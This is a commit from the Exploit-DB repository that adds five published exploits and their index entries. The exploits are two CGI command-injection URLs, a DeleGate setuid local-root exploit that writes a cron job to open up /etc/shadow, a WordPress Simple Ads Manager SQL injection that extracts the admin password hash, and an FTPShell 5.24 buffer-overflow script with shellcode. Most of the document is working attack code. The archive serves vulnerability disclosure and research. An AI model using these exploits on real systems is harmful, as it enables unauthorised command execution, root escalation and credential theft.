DB: 2015-12-31

5 new exploits
This commit is contained in:
Offensive Security 2015-12-31 05:02:01 +00:00
parent 2f4bedf752
commit ae8b3fb122
6 changed files with 349 additions and 0 deletions

View file

@ -35378,3 +35378,8 @@ id,file,description,date,author,platform,type,port
39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution Vulnerability",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection Vulnerability",2014-02-21,"Vulnerability Laboratory",php,webapps,0
39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Include Vulnerability",2014-03-25,"Gjoko Krstic",php,webapps,0
39130,platforms/cgi/webapps/39130.txt,"DotItYourself 'dot-it-yourself.cgi' Remote Command Execution Vulnerability",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem 'pbs.cgi' Remote Command Execution Vulnerability",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66487/info
DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
DotItYourself 6.11.060830 is vulnerable; other versions may also be affected.
http://www.example.com/cade/dot-it-yourself.cgi?download=;id|

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/66489/info
Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
Beheer Systeem 6.1 is vulnerable; other versions may also be affected.
http://www.example.com/!/pbs.cgi?download=;id|

49
platforms/linux/local/39134.txt Executable file
View file

@ -0,0 +1,49 @@
Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/
http://delegate.org/delegate/
Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.sato@delegate.org ysato@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.
Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user. The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk. By creating a file in /etc/cron.hourly a local user can execute commands as root.
Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries. In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux)
From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english):
Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe.
"In Unix version subin in if you want to use "(such as when using a privileged port), do the following.
(3-2uk) $ cd DgRoot / subin
$ Sh setup-subin.sh
larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root larry 384114 Oct 31 2014 dgbind
-r-sr-s--- 1 root larry 384598 Oct 31 2014 dgchroot
-r-sr-s--- 1 root larry 384161 Oct 31 2014 dgcpnod
-rwxr-xr-x 1 larry larry 384114 Oct 31 2014 dgdate
-rwxr-xr-x 1 larry larry 29066 Oct 31 2014 dgforkpty
-r-sr-s--- 1 root larry 384113 Oct 31 2014 dgpam
-rwxr-x--- 1 larry larry 272 Oct 27 2014 setup-subin.sh
This script sets the setuid bit on four binaries:
larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
#!/bin/sh
SUBINS="dgpam dgbind dgchroot dgcpnod"
sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
if [ $? != 0 ]; then
su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
fi
CVEID: 2015-7556
Exploit Code:
$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme

101
platforms/php/webapps/39133.php Executable file
View file

@ -0,0 +1,101 @@
/*
# Exploit Title: Simple Ads Manager 2.9.4.116 SQL Injection
# Date: 30-12-2015
# Software Link: https://wordpress.org/plugins/simple-ads-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$whereClause and $whereClauseT and $whereClauseW and $whereClause2W are not escaped.
File: simple-ads-manager\ad.class.php
$aSql = "
(SELECT
@pid := sp.id AS pid,
0 AS aid,
sp.name,
sp.patch_source AS code_mode,
@code_before := sp.code_before AS code_before,
@code_after := sp.code_after AS code_after,
@ad_size := IF(sp.place_size = \"custom\", CONCAT(CAST(sp.place_custom_width AS CHAR), \"x\", CAST(sp.place_custom_height AS CHAR)), sp.place_size) AS ad_size,
sp.patch_code AS ad_code,
sp.patch_img AS ad_img,
\"\" AS ad_alt,
0 AS ad_no,
sp.patch_link AS ad_target,
0 AS ad_swf,
\"\" AS ad_swf_flashvars,
\"\" AS ad_swf_params,
\"\" AS ad_swf_attributes,
\"\" AS ad_swf_fallback,
sp.patch_adserver AS ad_adserver,
sp.patch_dfp AS ad_dfp,
0 AS count_clicks,
0 AS code_type,
IF((sp.patch_source = 1 AND sp.patch_adserver) OR sp.patch_source = 2, -1, 1) AS ad_cycle,
@aca := IFNULL((SELECT AVG(sa.ad_weight_hits*10/(sa.ad_weight*$cycle)) FROM $aTable sa WHERE sa.pid = @pid AND sa.trash IS NOT TRUE AND {$whereClause} {$whereClauseT} {$whereClause2W}), 0) AS aca
FROM {$pTable} sp
WHERE {$pId} AND sp.trash IS FALSE)
UNION
(SELECT
sa.pid,
sa.id AS aid,
sa.name,
sa.code_mode,
@code_before AS code_before,
@code_after AS code_after,
@ad_size AS ad_size,
sa.ad_code,
sa.ad_img,
sa.ad_alt,
sa.ad_no,
sa.ad_target,
sa.ad_swf,
sa.ad_swf_flashvars,
sa.ad_swf_params,
sa.ad_swf_attributes,
sa.ad_swf_fallback,
0 AS ad_adserver,
0 AS ad_dfp,
sa.count_clicks,
sa.code_type,
IF(sa.ad_weight, (sa.ad_weight_hits*10/(sa.ad_weight*$cycle)), 0) AS ad_cycle,
@aca AS aca
FROM {$aTable} sa
WHERE sa.pid = @pid AND sa.trash IS FALSE AND {$whereClause} {$whereClauseT} {$whereClauseW})
ORDER BY ad_cycle
LIMIT 1;";
http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html
2. Proof of Concept
*/
<?php
$out = array();
$out['WC'] = '1=0';
$out['WCT'] = '';
$out['WCW'] = ') UNION (SELECT user_pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2 FROM wp_users WHERE ID = 1';
$out['WC2W'] = '';
?>
<form method="post" action="http://wp-url/wp-content/plugins/simple-ads-manager/sam-ajax-loader.php">
<input type="hidden" name="action" value="load_place">
<input type="hidden" name="id" value="0">
<input type="hidden" name="pid" value="1">
<input type="text" name="wc" value="<?php echo base64_encode(serialize($out)); ?>">
<input type="submit" value="Send">
</form>
/*
Administrator password will be here:
{"success":true,"ad":"<div id='c2077_1_%here_is_password%' class='sam-container sam-place' data-sam='0'><\/div>","id":"1","pid":"%here_is_password%","cid":"c2077_1_%here_is_password%"}
3. Solution:
Update to version 2.9.5.118
*/

176
platforms/windows/local/39132.py Executable file
View file

@ -0,0 +1,176 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt
Vendor:
================================
www.ftpshell.com
Product:
================================
FTPShell Client version 5.24
FTPShell client is a windows file transfer program that enables users to
reliably transfer files,
upload to websites, and download updates from the internet.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
ftpshell.exe client has a buffer overflow entry point in the 'Address'
input field used to connect to an FTP server.
Allowing local arbitrary code execution by overwriting several registers on
the stack and controlling program execution flow.
EIP register will be used to jump to our malicious shellcode which will be
patiently waiting in ECX register.
exploited registers dump...
EAX 00000021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe" <--------- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDE000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST C5E1 Cond 1 1 0 1 Err 1 1 1 0 0 0 0 1 (Unordered)
FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0
test stack dump....
(3b8.fa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
ftpshell.exe -
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8
edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00210202
41414141 ?? ???
Exploit code(s):
===============
'''
import struct
#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#payload="A"*2475+"R"*4+"\xcc"*100 #<---- control EIP register
#find appropriate assembly instruction to call our payload JMP or CALL ECX.
#!mona jmp -r ecx -m kernel32.dll
eip=struct.pack('<L', 0x761C1FDC) #jmp ecx kernel32.dll
payload="A"*2475+eip+sc #<----- direct EIP overwrite no NOPs
no nothing... BOOOOOM!!!
file=open("C:\\ftpshell-exploit","w")
file.write(payload)
file.close()
'''
Disclosure Timeline:
========================================
Vendor Notification: NR
December 29, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] Local Injection
Vulnerable Product: [+] FTPShell Client version 5.24
Vulnerable Parameter(s): [+] 'Address'
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''